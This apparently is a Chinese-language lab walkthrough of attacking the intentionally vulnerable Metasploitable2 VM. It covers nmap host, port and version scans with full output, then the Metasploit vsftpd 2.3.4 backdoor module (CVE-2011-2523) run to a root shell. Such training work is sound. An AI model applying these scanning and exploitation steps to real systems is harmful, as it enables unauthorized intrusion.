本文最后更新于 420 天前,其中的信息可能已经有所发展或是发生改变。
简介
这是个专门匹配 msf 演示的 Linux 操作系统,暴露了很多高危端口,也存在一些高危漏洞。
下载地址
https://pan.baidu.com/s/1shixJeI1Ca4D0WpI5GUV8w?pwd=sfk5
下载后是个压缩包,直接解压,使用 vmware 打开即可
默认的用户名密码: msfadmin/msfadmin
使用 sudo passwd root 设置 root 用户名密码
前提
- MetasploitTable2 靶机开机
- Metasploit
主机发现
nmap -sP 192.168.225.0/24┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.225.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:02 EDT Nmap scan report for localhost (192.168.225.1) Host is up (0.0048s latency). Nmap scan report for localhost (192.168.225.2) Host is up (0.0039s latency). Nmap scan report for localhost (192.168.225.128) Host is up (0.00069s latency). Nmap scan report for localhost (192.168.225.139) Host is up (0.0012s latency). Nmap done: 256 IP addresses (4 hosts up) scanned in 2.45 seconds本机地址是 128,那么目标机器就是 139
端口发现
nmap -sT 192.168.225.139
┌──(kali㉿kali)-[~]
└─$ nmap -sT 192.168.225.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:06 EDT
Nmap scan report for localhost (192.168.225.139)
Host is up (0.30s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.17 seconds21 端口渗透
版本扫描
nmap -sV -p 1-65535 192.168.225.139(有亿点点慢)
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p 1-65535 192.168.225.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-17 03:08 EDT
Nmap scan report for localhost (192.168.225.139)
Host is up (0.0023s latency).
Not shown: 65505 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login
514/tcp open shell?
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42536/tcp open nlockmgr 1-4 (RPC #100021)
42763/tcp open status 1 (RPC #100024)
43178/tcp open mountd 1-3 (RPC #100005)
45304/tcp open java-rmi GNU Classpath grmiregistry
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.93%I=7%D=10/17%Time=652E3305%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2B,"\x01Host\x20address\x20mismatch\x20for\x20192\.168\.225\.128\n");
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.44 seconds查找 nday 漏洞库
CVE 漏洞库:https://cve.mitre.org/cgi-bin/cvekey.cgi
搜索关键字:vsftpd 2.3.4
拿到关键字:
- vsftpd
- CVE-2011-2523
- CVE-2011-0762
在 msfconsole 中 search 这几个关键字,查看是否收录相关漏洞
搜索到 1 个 vsftpd_234_backdoor 漏洞
漏洞利用
use 0 使用搜索到序号为 0 的模块
show options 查看参数配置
set rhosts 192.168.225.139 配置 RHOSTS 参数为目标机器
run 运行 payload
- 失败了:Exploit completed, but no session was created
show options 查看参数配置
- 参数配置发现没有异常
run 再次执行
- 成功了(应该是概率问题)
whoami 查看当前用户,发现为 root
ifconfig 查看当前机器 IP,发现已经为目标机器 139